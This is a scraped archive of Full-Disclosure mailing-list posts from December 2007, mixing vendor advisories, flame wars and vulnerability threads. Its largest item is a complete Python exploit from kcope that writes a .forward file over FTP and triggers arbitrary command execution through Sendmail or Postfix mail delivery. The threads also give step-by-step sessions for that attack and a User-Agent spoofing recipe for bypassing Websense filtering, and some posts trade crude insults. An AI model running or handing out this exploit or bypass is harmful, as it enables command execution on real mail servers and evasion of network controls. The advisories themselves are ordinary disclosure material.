iD8DBQFHYZJzuhJ+ozIKI5gRApNZAJ4lyQH5GodTtPl31edgBjE1Mge9VACfQ+Pt UkVIFHoUX8JxEYkUg9v4otA= =mWha -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
You have write perms on a users home directory and this was the best way you could come up with to execute commands? Please send me details on your recipe for boiled water. Be sure to gzip it though as I imagine it is several pages long. YAY! On Dec 13, 2007 2:18 PM, kcope [EMAIL PROTECTED] wrote: Small Design Bug in Postfix - REMOTE There's a small issue on how Postfix forwards mails. A user can have a .forward file in her home directory. Inside this file she can specifiy an alternative recipient or use aliasing to execute commands when mail is received. From the manpage ALIASES(5) aliases - Postfix local alias database format |command Mail is piped into command. Commands that contain special characters, such as whitespace, should be enclosed between double quotes. See local(8) for details of delivery to command. When the command fails, a limited amount of command output is mailed back to the sender. The file /usr/include/sysexits.h defines the expected exit status codes. For example, use |exit 67 to simu- late a user unknown error, and |exit 0 to implement an expensive black hole. This is fine since postfix properly drops privileges before executing the command. The Problem with executing commands via .forward files is that if someone manages to place a file into ones home directory and just sends a file to the mailserver she can execute commands even when she's not supposed to or does not have the privileges. Here is an example exploitation session, the user 'rootkey' only has ftp access with write permissions and no other privileges than that. Login to FTP server telnet box 21 USER rootkey PASS rootkey123 logged in Put .forward file with following contents into the home directory of user 'rootkey'. ---snip--- |touch /tmp/XXX ---snip--- put .forward Now send an email to user rootkey. telnet box 25 mail from: rootkey rcpt to: rootkey data . RESULT: [EMAIL PROTECTED]:~$ ls /tmp/testXXX /tmp/testXXX signed, - -kcope/2007 -- GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass
On Dec 13, 2007 1:45 PM, reepex [EMAIL PROTECTED] wrote: automatic updates with notification? Silent patching? Microsoft tactics? I also knew websense was a joke but now you have come to this? Whats next? AV companies automatically updating without your permission? Websense adding new sites to their list of blocked sites without sending you an email per new site being blocked? AntiMalware companies doing the same? Chaos! -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200712-12 ] IRC Services: Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: IRC Services: Denial of Service Date: December 13, 2007 Bugs: #199897 ID: 200712-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A Denial of Service vulnerability has been reported in IRC Services. Background == IRC Services is a system of services to be used with Internet Relay Chat networks. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-irc/ircservices 5.0.63 = 5.0.63 Description === loverboy reported that the default_encrypt() function in file encrypt.c does not properly handle overly long passwords. Impact == A remote attacker could provide an overly long password to the vulnerable server, resulting in a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All IRC Services users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-irc/ircservices-5.0.63 References == [ 1 ] CVE-2007-6122 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6122 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHYZqouhJ+ozIKI5gRAkXqAJ9LYt2SRQXKMWQzU3qqiElskVIWUACfYBlP JZCdn8HJrEfWKnlXVM4WkmM= =ANC3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
Look this also seems to work on sendmail. Not verified tough. -- GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:245 ] - Updated wpa_supplicant package fixes remote denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:245 http://www.mandriva.com/security/ ___ Package : wpa_supplicant Date: December 13, 2007 Affected: 2008.0 ___ Problem Description: Stack-based buffer overflow in driver_wext.c in wpa_supplicant 0.6.0 allows remote attackers to cause a denial of service (crash) via crafted TSF data. Updated package fixes this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6025 ___ Updated Packages: Mandriva Linux 2008.0: 80c2dc52d42fb324f6ff90fcfe02b9fa 2008.0/i586/wpa_gui-0.6.0-1.1mdv2008.0.i586.rpm 0ec22d8e71719af986748a86ee4063ce 2008.0/i586/wpa_supplicant-0.6.0-1.1mdv2008.0.i586.rpm 18581ca13cf1758016bfaf52a0ea4992 2008.0/SRPMS/wpa_supplicant-0.6.0-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 677b536c2f630585c2df72a832aee497 2008.0/x86_64/wpa_gui-0.6.0-1.1mdv2008.0.x86_64.rpm 0c87ce95a9432518480ccdc7eed168bb 2008.0/x86_64/wpa_supplicant-0.6.0-1.1mdv2008.0.x86_64.rpm 18581ca13cf1758016bfaf52a0ea4992 2008.0/SRPMS/wpa_supplicant-0.6.0-1.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHYXedmqjQ0CJFipgRAhPNAJsH5R9sOhbryDMXZr2ZidM6EofWewCg2CHm DI6aimKhL9T+IazFIlxpxkk= =Ue4m -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] gimp sc, and evilness
This is a quite ridiculous series of emails that quickly turned south. Someone should clear this up. On Dec 13, 2007 12:48 AM, Kristian Erik Hermansen [EMAIL PROTECTED] wrote: I don't appreciate people spreading false info about me. If there is a problem, I would rather you say it to my face, in person, than behind my back. I don't have a problem with you, but if you are blackballing me in the security community, then you and I have something to discuss... On Dec 12, 2007 12:20 PM, Kristian Erik Hermansen [EMAIL PROTECTED] wrote: Hi Christopher, I do not mean to be shady at all. The point of the exploit was not I didnt call you shady. I LOLed a shady LOL. A LOL--A shady one original shellcode. The point was creating a universal exploit for Gimp on Windows which would also allow dynamic payload. If you see, the shellcode payload changes based on the user input for the URL. Nothing new, but useful for demonstration purposes. I perhaps should have left the second line from the Metasploit output so that attribution was taken. I was not aware that shellcode output from msf is intellectual property. I have given Metasploit plenty of credit when I thought necessary. I even asked H D Moore to borrow some images for a talk I did at the Ubuntu Live conference in Oregon this year, which he personally allowed... http://www.kristian-hermansen.com/clonezilla/clonezilla.pdf I also tried to do MSF a favor for more exposure and get 3.0 into Ubuntu's multiverse repository. However, due to some nuances in the MSF License, this was not possible. I don't see why you think I am so evil. I do not mean to be. I wish I could have made it to your gathering of drinks at 20 GOTO 10 post-baysec, but I was still in Boston. I will try to meet up with you guys at the next baysec, and you will see that I am not evil. Of course, my background in security is not as proficient as yours, and I have never been a CEO. Although, I am very familiar with all the companies you have lead. I do, however, wonder why you left Cloudmark just after it became profitable. To me, that sounds shady... Additionally, Cloudmark is a privately held company so either you guessed that they were profitable or an employee with a loose tongue unwittingly disclosed that information to you against their employment contract. -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass
It's a patch to the protocol signature database, happens nightly. From: reepex [mailto:[EMAIL PROTECTED] Sent: Thursday, December 13, 2007 10:46 AM To: Hubbard, Dan; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass automatic updates with notification? Silent patching? Microsoft tactics? I also knew websense was a joke but now you have come to this? On Dec 13, 2007 8:49 AM, Hubbard, Dan [EMAIL PROTECTED] wrote: An added note on this... Customers do not need to download nor install any new patch for this fix. It was automatically updated and installed with our nightly protocol signature updates. -Original Message- From: [EMAIL PROTECTED] [mailto: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ] On Behalf Of The Security Community Sent: Wednesday, December 12, 2007 3:32 PM To: [EMAIL PROTECTED]; Full-Disclosure Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass Mr. HinkyDink would like to share the following with the Security Community... -- Forwarded message -- From: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] Date: Dec 12, 2007 6:05 PM Subject: Websense 6.3.1 Filtering Bypass To: [EMAIL PROTECTED] Please share this with your little friends... -- Websense Policy Filtering Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise 6.3.1 EXPOSURE: Web Filtering Bypass SYNOPSIS By spoofing the User-Agent header it is possible to bypass filtering and, to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment. PROOF OF CONCEPT The following was tested in an unpatched 6.3.1 system using the ISA Server integration product. It is assumed it will work with other integration products but this has not been tested. Other User Agents may also work. I. Install FireFox 2.0.x II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick III. Add the following User Agents to the plug-in Description: RealPlayer User Agent : RealPlayer G2 Description: MSN Messenger User Agent : MSMSGS Description: WebEx User Agent : StoneHttpAgent IV. Change FireFox's User Agent to any one of the preceding values V. Browse to a filtered Web site VI. Content is allowed Content browsed via this method will be recorded in the Websense database as being in the Non-HTTP category. Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ SEE ALSO Websense KnowledgeBase article #976 The vendor acknowledges this behavior in the aforementioned article. WORKAROUND == Disable the protocols mentioned above. VENDOR RESPONSE === Websense has repaired this issue in database #92938 NOTICE == mrhinkydink is not to be confused with the blogger by the same name at www.dailykos.com c. MMVII mrhinkydink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Protected by Websense Messaging Security ? www.websense.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Click here https://www.mailcontrol.com/sr/Jo+9N2kMkss75ZucUpZhRp2tihLnD5c4rWWfdAaP U9YfGN7ptLE6OsoAO+XvfwiHtEzvgPLjSZPxcw3B5Y5XDyPFvOGuUpO5Q87uxOwIFjMpxw1i utg6REZstBhj9JnKPoif2919X!Ptf6Kif6flhzLOBSUMW3t2nYXR!5Lo3JL+oiz30xcCB4E7 ak4hnJfmdA+ZQfG1SxBSBKtqujQEyHUQ!9WMdjXr to report this email as spam. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
basically i am saying i could care less, it was years ago, and i certaintly do not care about your gay antics at security cons or on this or any other public forum... can you really not be any better than a worthless pile of gmail poop? or at least let everone see your great security worx... but i seriously doubt that will happen * kinda like n3td3v\s great security research / discoveries! ciao - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, December 13, 2007 10:43 AM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability so are you now admitting your vulnerability was worthless? On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote: im so hurt now... you make me feel so small compared to your great worx MrReepass stfu kthnx - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 12, 2007 9:01 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
Confirmed Macosx is not vulnerable to this. just1n -- Surprise - in internet it is everytime! Mac OS X Evangelist -- ___ Get a free @hellokitty.com, @mymelody.com, or @kuririnmail.com email account today at www.sanriotown.com, and enjoy 500MB of storage! Check out our official blog @ http://blog.hellokitty.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
exploiting features (see attached) - -kcope / 2007 -- Pt! Schon vom neuen GMX MultiMessenger gehört? Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger #!python # (C) 2007 kcope production from ftplib import FTP import sys import socket print Sendmail/Postfix FORWARD Remote Exploit print kcope/2007 - hey alex,andi if (len(sys.argv) != 4): print usage: skyline.py hostname ftp username ftp password sys.exit() hostname = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print [+] INITIAL FTP STOR def FTPconnect(initial): try: ftp = FTP(hostname) print ftp.getwelcome() ftp.login(username, password) if (initial): f = open(.forward, wb) f.write(|touch /tmp/XXX\n) f.close() f = open(.forward, rb) ftp.storbinary(STOR .forward, f) ftp.quit() f.close() except: print [-] FTP Error. Correct Login Credentials ? sys.exit() FTPconnect(True) print [+] PLEASE ENTER COMMANDS TO EXECUTE print [+] sendmail allows a single command print [+] postfix allows many print [+] END WITH . IN A SINGLE LINE input = sys.stdin.readline().strip() f = open(.forward, wb) f.writelines(| + \ + input + ~/RESULTS + \ + \n) while (True): input = sys.stdin.readline().strip() if (input == .): break f.writelines(| + \ + input + ~/RESULTS + \ + \n) f.close() print [+] FTP STOR FTPconnect(False) print [+] EXPLOITING BOX try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((hostname, 25)) smtpline = s.recv(1024) smtphostname = smtpline[4:smtpline.find( , 5)] s.close() except: print [-] EXPLOTATION Error. Is sendmail/postfix running ? sys.exit() try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((hostname, 25)) smtpline = s.recv(1024) print smtpline s.send(HELO eyecandy\r\n) s.recv(1024) s.send(MAIL FROM: + username + @ + smtphostname + \r\n) s.recv(1024) s.send(RCPT TO: + username + @ + smtphostname + \r\n) s.recv(1024) s.send(DATA + \r\n) s.recv(1024) s.send(. + \r\n) s.recv(1024) s.send(quit + \r\n) s.recv(1024) s.close() except: print [-] EXPLOTATION Error. Is sendmail/postfix running ? sys.exit() print [+] RETRIEVING RESULTS try: ftp = FTP(hostname) print ftp.getwelcome() ftp.login(username, password) ftp.retrlines(RETR RESULTS) ftp.delete(RESULTS) except: print [-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ? sys.exit() for line in open(RESULTS): print line f.close() ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
On Thu, 2007-12-13 at 21:18 +0100, kcope wrote: Put .forward file with following contents into the home directory of user 'rootkey'. Why not just put /tmp/XXX instead and bypass the extra bit about the MTA? -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
You should post this to milw0rm as it can always use quality exploit code
like this. I also have some priv8 code which I would like to disclose which
is the same type of vulnerability.
/*
* Author: Fredrick Diggle
* Vuln: execve system call allows arbitrary code execution
* Status: VERY PRIV8
* DO NOT RELEASE OR FRED DIGGLE WILL EAT YOUR FAMILY
*/
#include stdlib.h
#include stdio.h
#include unistd.h
#define INFINITY 73
#ifdef DIGGLEISAWESOME
int main(int argc, char **argv) {
if (argc 2) { fprintf(stderr, usage: %s [command to run]\n\tPRIV8 Fred
Diggle 0day\n, argv[0]); return INFINITY; }
execve(argv[1], argv[1], 0);
}
#endif
On Dec 13, 2007 8:57 PM, kcope [EMAIL PROTECTED] wrote:
exploiting features
(see attached)
- -kcope / 2007
--
Pt! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
